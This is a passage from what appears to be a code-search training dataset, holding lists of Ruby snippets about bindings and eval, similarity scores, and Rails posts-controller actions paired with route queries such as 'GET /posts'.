"def call_on_binding(binding_, *context)\n if binding_.local_variable_defined?(applicable)\n binding_.local_variable_get(applicable)\n else\n invoke_lambda(binding_.receiver.method(applicable), binding_, *context)\n end\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def __replace_eval__(line, gen_code)\n # class_eval\n if line =~ \n /(.*)((class_eval)|(module_eval)|(instance_eval)|(eval)) ?\\(?\"(.*)\"\\)? ?(.*)/\n printf \"%s%s {%s} %s\\n\", $1, $2, gen_code[:code], $8\n end\nend",
"def doSomething\r\n puts \"inside the method\"\r\n return binding\r\nend",
"def get_binding\n return binding()\n end",
"def get_binding\n return binding()\n end",
"def generate_binding(a_binding=binding)\n a_binding.local_variables do |local_var|\n a_binding.local_variable_set local_var, nil\n end\n @bound_procs.each_with_index do |bound_proc, index|\n a_binding.local_variable_set \"proc_#{index}\", bound_proc\n end\n @bound_constants.each_with_index do |bound_const, index|\n a_binding.local_variable_set \"const_#{index}\", bound_const\n end\n a_binding\n end",
"def bind(key,obj,*args)\n\t\t@bindings[key] = [obj,*args]\n\tend",
"def get_binding\n binding()\n end",
"def get_binding\n binding()\n end",
"def get_binding\n binding()\n end",
"def execute(cmd)\n eval(EXECUTE, binding, __FILE__, EXECUTE_LINE)\n nil\nend",
"def test_method_calls_can_take_and_execute_fn_parm\n result = interpret 'a=~{foo: ->(fn) { %fn }};%a.foo(->() {4})'\n assert_eq result, 4\n end",
"def expression=(_arg0); end",
"def evaluate(expr = nil, path=nil, line=nil, &bl)\n return instance_exec(&bl) if bl\n ::Kernel.eval expr, __eval_binding, *[path, line].compact\n end",
"def bind\n binding\n end",
"def bind\n \n end",
"def get_binding\n a = 123 # => 123\n binding # => #<Binding:0x007fd7c087add0>\nend",
"def expand(str)\n str = str.gsub(/\\$\\{([^}]+)\\}/, '#{\\1}') # ${..} => #{..}\n eval \"\\\"#{str}\\\"\", @placeholders.instance_eval { binding }\n end",
"def do_binding\n symbol = pop[:value]\n\t\tvalue = pop\n\t\t@fstack.set( symbol, value )\n end",
"def eval_value(*args)\n eval(*args).value\n end",
"def compile_eval_arg(scope, arg)\n if arg.respond_to?(:position) && arg.position != nil\n pos = arg.position.inspect\n if pos != @lastpos\n @e.comment(arg.position.inspect)\n if @trace\n compile_exp(scope,[:call,:puts,arg.position.inspect])\n end\n end\n @lastpos = pos\n end\n args = get_arg(scope,arg)\n atype = args[0]\n aparam = args[1]\n if atype == :ivar\n ret = compile_eval_arg(scope, :self)\n @e.load_instance_var(ret, aparam)\n return @e.result_value\n elsif atype == :possible_callm\n return compile_eval_arg(scope, [:callm, :self, arg,[]])\n end\n return @e.load(atype, aparam)\n end",
"def try_eval(expr)\n eval_expr(expr)\n end",
"def process_call(exp)\n receiver_node_type = exp.first.nil? ? nil : exp.first.first\n receiver = process exp.shift\n receiver = \"(#{receiver})\" if ASSIGN_NODES.include? receiver_node_type\n\n name = exp.shift\n args = []\n\n # this allows us to do both old and new sexp forms:\n exp.push(*exp.pop[1..-1]) if exp.size == 1 && exp.first.first == :arglist\n\n @calls.push name\n\n in_context :arglist do\n until exp.empty? do\n arg_type = exp.first.sexp_type\n is_empty_hash = (exp.first == s(:hash))\n arg = process exp.shift\n\n next if arg.empty?\n\n strip_hash = (arg_type == :hash and\n not BINARY.include? name and\n not is_empty_hash and\n (exp.empty? or exp.first.sexp_type == :splat))\n wrap_arg = Ruby2Ruby::ASSIGN_NODES.include? arg_type\n\n arg = arg[2..-3] if strip_hash\n arg = \"(#{arg})\" if wrap_arg\n\n args << arg\n end\n end\n\n case name\n when *BINARY then\n # CUSTOM\n \"#{receiver}#{name}#{args.join(', ')}\"\n when :[] then\n receiver ||= \"self\"\n \"#{receiver}[#{args.join(', ')}]\"\n when :[]= then\n receiver ||= \"self\"\n rhs = args.pop\n \"#{receiver}[#{args.join(', ')}] = #{rhs}\"\n when :\"-@\" then\n \"-#{receiver}\"\n when :\"+@\" then\n \"+#{receiver}\"\n # CUSTOM\n when :lambda then\n '->'\n # CUSTOM\n when :call then\n args = if args.empty?\n nil\n elsif args\n args.join(',')\n end\n\n \"#{receiver}[#{args}]\"\n else\n args = nil if args.empty?\n\n # CUSTOM\n args = if args and args.size == 1\n # It's safe to map a single arg to be spaced from\n # the receiver w/out parens in this context\n \" #{ args.first }\"\n elsif args\n \"(#{args.join(', ')})\"\n end\n\n receiver = \"#{receiver}.\" if receiver\n\n \"#{receiver}#{name}#{args}\"\n end\n ensure\n @calls.pop\n end",
"def eval\n begin\n if !func_exist?(@name)\n raise NameError, \"Function #{@name} has not been declared.\"\n else\n if @@our_debug then puts \"#{debug_time} Function called : #{@name}\" end\n para = @@func_list[@name].para\n if @args[0] != nil and para[0] != nil\n #Making sure we only get Basic_container type objects in @args\n @args.each_with_index {|arg, idx| @args[idx] = convert_obj(arg)}\n scope_increase\n @@func_list[@name].para.each {|item| item.eval }\n @args.each_with_index {|arg, idx|\n Assign_class.new(para[idx].name, arg).eval\n }\n elsif para[0] != nil\n scope_increase\n para.each {|item| item.eval }\n else\n scope_increase\n end\n ret_value = @@func_list[@name].eval\n scope_decrease\n return convert_obj(ret_value)\n end\n Bool_class.new('bool', 'FALSE')\n rescue => error\n puts error.inspect\n end\n end",
"def instance_eval\n end",
"def eval(obj, str)\n @extension.evaluate(obj, str)\n end"
] |
[
"0.75313014",
"0.7441519",
"0.710835",
"0.7097458",
"0.7048693",
"0.70203006",
"0.6774199",
"0.6713175",
"0.6596647",
"0.6596647",
"0.6571318",
"0.6488089",
"0.6488089",
"0.6442359",
"0.6355621",
"0.6331491",
"0.6294697",
"0.6294697",
"0.6283392",
"0.62818265",
"0.6239487",
"0.6223339",
"0.6172398",
"0.6116129",
"0.61065483",
"0.6087584",
"0.6044246",
"0.6036835",
"0.6021368",
"0.6015855",
"0.6001672",
"0.59991574",
"0.59977096",
"0.598628",
"0.5974302",
"0.59712905",
"0.59687775",
"0.5951734",
"0.5950591",
"0.59205717",
"0.59117085",
"0.59053814",
"0.59053814",
"0.5900759",
"0.5891652",
"0.5858361",
"0.5852073",
"0.58505523",
"0.58005744",
"0.5777062",
"0.5771052",
"0.5758545",
"0.57321596",
"0.572154",
"0.5717252",
"0.5709494",
"0.57090896",
"0.57085013",
"0.5690934",
"0.56841034",
"0.5683218",
"0.56820476",
"0.5674146",
"0.56705284",
"0.566704",
"0.5651587",
"0.5640356",
"0.5639068",
"0.5635017",
"0.5635017",
"0.5635017",
"0.5635017",
"0.5635017",
"0.5635017",
"0.5635017",
"0.5635017",
"0.56338173",
"0.56085813",
"0.5598999",
"0.5598999",
"0.5592848",
"0.5589959",
"0.5578738",
"0.5578738",
"0.5578738",
"0.55651206",
"0.5564176",
"0.554666",
"0.5544974",
"0.55360764",
"0.55337226",
"0.5528109",
"0.55254245",
"0.55195177",
"0.55171937",
"0.551384",
"0.5511636",
"0.5506622",
"0.5495474",
"0.5487023",
"0.5468513"
] |
0.0
|
-1
|
GET /posts GET /posts.json
|
def index
@posts = Post.all
@event = Event.find(params[:event_id])
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def show\n @posts = Post.find(params[:id])\n render json: @posts\n end",
"def index\n @posts = Post.all\n render json: @posts\n end",
"def index\n @posts = Post.all\n\n render json: @posts\n end",
"def index\n @posts = Post.all\n\n render json: @posts\n end",
"def index\n @posts = Post.all\n render json: @posts\n end",
"def index\n\n @posts = Post.all\n\n render json: @posts, status: 200\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json {render json: @posts}\n end\n end",
"def index\n render json: { posts: Post.all }\n end",
"def index\n @posts = Post.order(\"created_at DESC\").includes(:user)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n respond_to do |format|\n format.html #index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @posts }\n end\n end",
"def index\n @posts = Post.all\n \n render json: @posts\n end",
"def show\n @post = Post.find(params[:id])\n\n render json: @post\n end",
"def show\n post = Post.find(params[:id])\n render json: post\n end",
"def show\r\n post = Post.find(params[:id])\r\n render json: post\r\n end",
"def display_posts\n begin\n response = RestClient.get \"#{@@DOMAIN}/api/posts.json?all\", authorization_hash\n\n puts \"Response code: #{response.code}\"\n puts \"Response cookies:\\n #{response.cookies}\\n\\n\"\n puts \"Response headers:\\n #{response.headers}\\n\\n\"\n puts \"Response content:\\n #{response.to_str}\"\n\n js = JSON response.body\n js.each do |item_hash|\n item_hash.each do |k, v|\n puts \"#{k}: #{v}\"\n end\n end\n rescue => e\n puts STDERR, \"Error accessing REST service. Error: #{e}\"\n end\n end",
"def posts(opts)\n response = get(\"posts\", opts)\n response\n end",
"def index\n @posts = Post.all.order(created_at: :asc)\n json_response(@posts)\n end",
"def show\n \trender json: Post.find(params[:id])\n end",
"def index\n render json: Post.all\n end",
"def show\n\t \trender json: Post.find(params[:id])\n\t end",
"def show\n @user = User.find(params[:user_id])\n @post = @user.posts.find(params[:id])\n\n render json: @post\n end",
"def index\n @posts = Post.paginate(:page => params[:page], :per_page => 10).order('id DESC')\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def show\n render json: Post.find(params[\"id\"])\n end",
"def index\n render json: { posts: current_user.posts.all.map(&:to_h) }\n end",
"def index\n @posts = Post.all\n @posts = paginate(@posts)\n authorize @posts\n\n render json: @posts, each_serializer: Api::V1::PostSerializer, meta: meta_attributes(@posts)\n end",
"def index\n @posts = Mist::Post.recently_published(20, Mist.authorized?(:view_drafts, self))\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @posts }\n end\n end",
"def show\n @user = User.find(params[:id])\n @posts = @user.posts\n\n respond_to do |format|\n format.json { render json: {user: User._build(@user), posts: Post.build_posts(@posts)}, location: root_path }\n end\n end",
"def show\n render json: @post\n end",
"def show\n render json: @post\n end",
"def index\n\t\tgon.posts = Post.all.as_json\n\tend",
"def index\n # @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n # format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.atom\n end\n end",
"def get(options = {})\n response= handle_errors { self.class.get('/get', :query => options)}\n if response[\"posts\"][\"post\"].is_a?(Hash)\n Rubycious::Post.new response[\"posts\"][\"post\"]\n elsif response[\"posts\"][\"post\"].is_a?(Array)\n response[\"posts\"][\"post\"].collect{|i| Rubycious::Post.new(i)}\n else\n nil\n end\n end",
"def index\n\n # We display the posts be cronological inverted order\n if authenticated?\n @posts = Post.order('created_at DESC').page(params[:page])\n else\n @posts = Post.order('created_at DESC').where(:status => :true).page(params[:page])\n end\n \n respond_to do |format|\n format.html { render html: @posts }\n format.json { render json: @posts }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n \n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def show\n @posts = @game.posts.order(created_at: :desc).paginate(page: params[:page], per_page: 5)\n respond_to do |format|\n format.json { render template: 'api/games/game.json' }\n end\n end",
"def show\n post = Post.find_by(id: params[:id])\n if post \n render json: post\n else\n render json: {errors: 'Not found'}\n end\n end",
"def show\n render :json => @post\n end",
"def get(options = EMPTY_HASH)\n parameters = Specification.new(\n tag: Types::Tags,\n dt: Types::Time,\n url: Types::URL,\n meta: Types::Boolean\n ).parameters(options)\n posts_from client.get(\"/posts/get\", parameters)\n end",
"def index\n @posts = Post.all\n # Post.all returns all of the posts currently in the \n # database as an array of Post records that we store \n # in an instance variable called @posts.\n # http://guides.rubyonrails.org/active_record_querying.html\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n # The respond_to block handles both HTML and JSON calls \n # to this action. If you browse to \n # http://localhost:3000/posts.json, you’ll see a JSON \n # containing all of the posts. \n end",
"def show\n render json: @post, serializer: Api::V1::PostSerializer\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n @posts = PostService.getAllPosts\n end",
"def show\n respond_to do |format|\n format.html\n format.json { render jsonapi: @post }\n end\n end",
"def index\n #@posts = Post.all\n @posts = Post.paginate( :page => params[:page],\n :per_page => 2\n )\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def show\n @post = Post.where(:id => params[:id]).first\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def index\n\t@posts = list_posts\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n #format.json { render json: @post }\n format.json do\n render :json => @post.to_json(:only => [:id, :title, :text, :lat, :lng, :created_at, :post_type, :likes], \n :methods => [:image_url, :video_url], \n :include => [:comments])\n end\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.xml { render xml: @posts }\n end\n end",
"def posts_list\n posts = Post.all.published.order(score: :desc, created_at: :desc)\n post_tags = Post.published.order(score: :desc, created_at: :desc).map { |post| Post.includes(:tags, :taggings).find_by(id: post.id).tags }\n categories = Category.all\n tags = Tag.all\n\n render_json(posts: posts, categories: categories, tags: tags, post_tags: post_tags)\n end",
"def index\n @posts = Post.all.order_by([:date_published, :desc]).page(params[:page]).per(20)\n #authorize! if cannot? :read, @posts\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def show\n @post ||= Mist::Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n page = params[:page]\n per_page = params[:per_page]\n\n posts = Post.order(published_at: :desc).page(page).per(per_page)\n\n # Передаём в заголовке общее количество страниц и записей.\n response.headers['Total-Pages'] = posts.total_pages\n response.headers['Total-Count'] = posts.total_count\n\n render json: posts\n end",
"def index\n render json: Post.all.order(id: :desc), each_serializer: V1::Posts::PostSerializer\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.json { render json: @post }\n format.xml { render xml: @posts }\n end\n end",
"def posts\n posts = @client.entries(content_type: 'post').items\n posts || []\n end",
"def show\n @post = Post.find(params[:id])\n \n respond_to do |format|\n format.html { render 'application/index' }\n format.json { render :json => { :post => @post.as_json } }\n end\n end",
"def show\r\n @post = root_post_of(Post.find(params[:id]))\r\n\r\n respond_to do |format|\r\n format.html # show.html.erb\r\n format.json { render json: @post }\r\n end\r\n end",
"def index\n @posts = Post.order(created_at: :desc)\n respond_to do |format|\n format.html { render }\n format.text { render }\n format.xml { render xml: @posts }\n format.json { render json: @posts.to_json }\n end\n end",
"def index\n @art_posts = ArtPost.all\n\n render json: @art_posts\n end",
"def index\n per_page = params[:per_page] ? params[:per_page] : Post::PER_PAGE\n @posts = Post.by_published_date.paginate(page: params[:page], per_page: per_page)\n # Set count of posts and count of pages to query headers\n add_headers\n render json: @posts\n end",
"def show\n render json: {\n data: @post\n }\n end",
"def show\n @feed = Feed.find(params[:id])\n @posts = @feed.posts.order(\"published desc\").paginate(:page => params[:page], :per_page => 20)\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @feed }\n end\n end",
"def index\n # TODO: implement listing all posts\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts, :include => :tags }\n end\n end",
"def list\n comments = Comment.where(post: @post)\n render json: comments, status: 200\n end",
"def show\n @post = current_user.posts.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n\t \tif params[:title]\n\t\t render json: Post.search(params[:title])\n \t\telse\n\t \trender json: Post.all\n \tend\n\t end",
"def index\n unless can?(:manage, Post)\n @posts = @posts.published\n end\n \n respond_with @posts\n end",
"def index\n @posts = Post.all\n respond_with(@posts)\n end",
"def index\n @posts = Post.all.reverse\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n render json: current_user.posts.all\n # TODO order posts alphabetically\n end",
"def index\n @posts = Post.includes(:author, channel: [:posts]).order(created_at: :desc)\n @posts = @posts.where(channel: @channel) if params[:channel_id]\n @posts = @posts.page(params[:page])\n\n respond_to do |format|\n format.html\n format.json { render jsonapi: @posts }\n end\n end",
"def show\n #@post = Post.find(params[:id])\n\n #respond_to do |format|\n # format.html # show.html.erb\n #format.json { render json: @post }\n #end\n end",
"def index\n @page = params[:page] || 1\n @posts = @exchange.posts.page(@page, context: 0).for_view\n respond_to do |format|\n format.json do\n serializer = PostSerializer.new(\n @posts,\n links: { self: paginated_json_path(@posts.current_page),\n next: paginated_json_path(@posts.next_page),\n previous: paginated_json_path(@posts.previous_page) },\n include: %i[user]\n )\n render json: serializer.serialized_json\n end\n end\n end",
"def index\n @postos = Posto.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @postos }\n end\n end",
"def show\n @post = Post.find(params[:id])\n render json: @post, meta: { status: :ok }, meta_key: 'result'\n end",
"def show\n # @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n # format.json { render json: @post }\n end\n end",
"def index\n @api_v1_posts = Api::V1::Post.all\n end",
"def index\n @posts = Post.order(\"created_at DESC\").where(:published => true).limit(5)\n @title = \"Home\"\n @description = \"the blog and website of bassist and programmer Johnny Grubb. no baseball information here.\"\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.xml\n end\n end",
"def index\n respond_with Post.all\n end"
] |
[
"0.7865315",
"0.7494904",
"0.7494433",
"0.7494433",
"0.7488696",
"0.74314564",
"0.728645",
"0.728645",
"0.728645",
"0.72562826",
"0.72522277",
"0.7247287",
"0.7246305",
"0.72221965",
"0.72042215",
"0.72039723",
"0.7169929",
"0.71689725",
"0.71644753",
"0.7121855",
"0.71152896",
"0.7108617",
"0.70960873",
"0.7071454",
"0.7063796",
"0.70486146",
"0.7044637",
"0.7029959",
"0.69793427",
"0.6957234",
"0.6945899",
"0.6921306",
"0.6918641",
"0.6897198",
"0.689313",
"0.6890521",
"0.68769336",
"0.6876437",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6856369",
"0.6854135",
"0.68492866",
"0.6837785",
"0.6814047",
"0.67974555",
"0.67884254",
"0.6782457",
"0.6779375",
"0.6779375",
"0.6770256",
"0.67645854",
"0.6760845",
"0.6751376",
"0.6740988",
"0.6720944",
"0.6703801",
"0.66790265",
"0.6662053",
"0.6649574",
"0.66334385",
"0.6629263",
"0.66292495",
"0.6625863",
"0.6625277",
"0.6619148",
"0.6612677",
"0.6612347",
"0.659554",
"0.65946317",
"0.6584386",
"0.6583931",
"0.6578741",
"0.6564504",
"0.6556115",
"0.65437686",
"0.65419716",
"0.65410036",
"0.6528237",
"0.65246344",
"0.6520045",
"0.65119064",
"0.6511185",
"0.64960027",
"0.64946514",
"0.64891815",
"0.6476575",
"0.64645535",
"0.6463598"
] |
0.0
|
-1
|
GET /posts/1 GET /posts/1.json
|
def show
@calendar = Calendar.find(params[:calendar_id])
@event = @calendar.events.find(params[:event_id])
#@post = Post.find[params[:id]]
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def show\n @posts = Post.find(params[:id])\n render json: @posts\n end",
"def show\n render json: Post.find(params[\"id\"])\n end",
"def show\r\n post = Post.find(params[:id])\r\n render json: post\r\n end",
"def show\n @post = Post.find(params[:id])\n\n render json: @post\n end",
"def show\n \trender json: Post.find(params[:id])\n end",
"def show\n post = Post.find(params[:id])\n render json: post\n end",
"def show\n\t \trender json: Post.find(params[:id])\n\t end",
"def show\n @post = Post.where(:id => params[:id]).first\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def index\n\n @posts = Post.all\n\n render json: @posts, status: 200\n end",
"def index\n @posts = Post.all\n render json: @posts\n end",
"def index\n @posts = Post.all\n\n render json: @posts\n end",
"def index\n @posts = Post.all\n\n render json: @posts\n end",
"def index\n @posts = Post.all\n render json: @posts\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def show\n @user = User.find(params[:user_id])\n @post = @user.posts.find(params[:id])\n\n render json: @post\n end",
"def index\n @posts = Post.all\n respond_to do |format|\n format.html #index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json {render json: @posts}\n end\n end",
"def index\n\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @posts }\n end\n end",
"def show\n \n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n render json: { posts: Post.all }\n end",
"def show\n @post ||= Mist::Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n @posts = Post.order(\"created_at DESC\").includes(:user)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def show\n # when you go to http://localhost:3000/posts/1, rails interprets this\n # as a call to the show action for the resource and passes 1 to the \n # :id paramater. Using this blog app you can do that by clicking the \n # show link for a post on the index page.\n\n @post = Post.find(params[:id])\n # The show action uses Post.find to search for a single record \n # in the database by its id value. After finding the record, Rails \n # displays it by using app/views/posts/show.html.erb\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n post = Post.find_by(id: params[:id])\n if post \n render json: post\n else\n render json: {errors: 'Not found'}\n end\n end",
"def index\n render json: Post.all\n end",
"def index\n @posts = Mist::Post.recently_published(20, Mist.authorized?(:view_drafts, self))\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @posts }\n end\n end",
"def index\n @posts = Post.all.order(created_at: :asc)\n json_response(@posts)\n end",
"def index\n @posts = Post.all\n \n render json: @posts\n end",
"def show\n @post = Post.find(params[:id])\n \n respond_to do |format|\n format.html { render 'application/index' }\n format.json { render :json => { :post => @post.as_json } }\n end\n end",
"def show\n render json: @post, serializer: Api::V1::PostSerializer\n end",
"def show\r\n @post = root_post_of(Post.find(params[:id]))\r\n\r\n respond_to do |format|\r\n format.html # show.html.erb\r\n format.json { render json: @post }\r\n end\r\n end",
"def show\n render json: @post\n end",
"def show\n @api_v2_post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @api_v2_post }\n end\n end",
"def show\n render json: @post\n end",
"def index\n @posts = Post.paginate(:page => params[:page], :per_page => 10).order('id DESC')\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.atom\n end\n end",
"def index\n render json: Post.all.order(id: :desc), each_serializer: V1::Posts::PostSerializer\n end",
"def show\n render :json => @post\n end",
"def index\n # @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n # format.json { render json: @posts }\n end\n end",
"def index\n @api_v1_posts = Api::V1::Post.all\n end",
"def show\n @post = Post.find(params[:id])\n render json: @post, meta: { status: :ok }, meta_key: 'result'\n end",
"def show\n respond_to do |format|\n format.html\n format.json { render jsonapi: @post }\n end\n end",
"def show\n @posts = @game.posts.order(created_at: :desc).paginate(page: params[:page], per_page: 5)\n respond_to do |format|\n format.json { render template: 'api/games/game.json' }\n end\n end",
"def show\n @post = PostsService.getPostById(params[:id])\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.json { render json: @post }\n format.xml { render xml: @posts }\n end\n end",
"def index\n #@posts = Post.all\n @posts = Post.paginate( :page => params[:page],\n :per_page => 2\n )\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n # Post.all returns all of the posts currently in the \n # database as an array of Post records that we store \n # in an instance variable called @posts.\n # http://guides.rubyonrails.org/active_record_querying.html\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n # The respond_to block handles both HTML and JSON calls \n # to this action. If you browse to \n # http://localhost:3000/posts.json, you’ll see a JSON \n # containing all of the posts. \n end",
"def index\n\n # We display the posts be cronological inverted order\n if authenticated?\n @posts = Post.order('created_at DESC').page(params[:page])\n else\n @posts = Post.order('created_at DESC').where(:status => :true).page(params[:page])\n end\n \n respond_to do |format|\n format.html { render html: @posts }\n format.json { render json: @posts }\n end\n end",
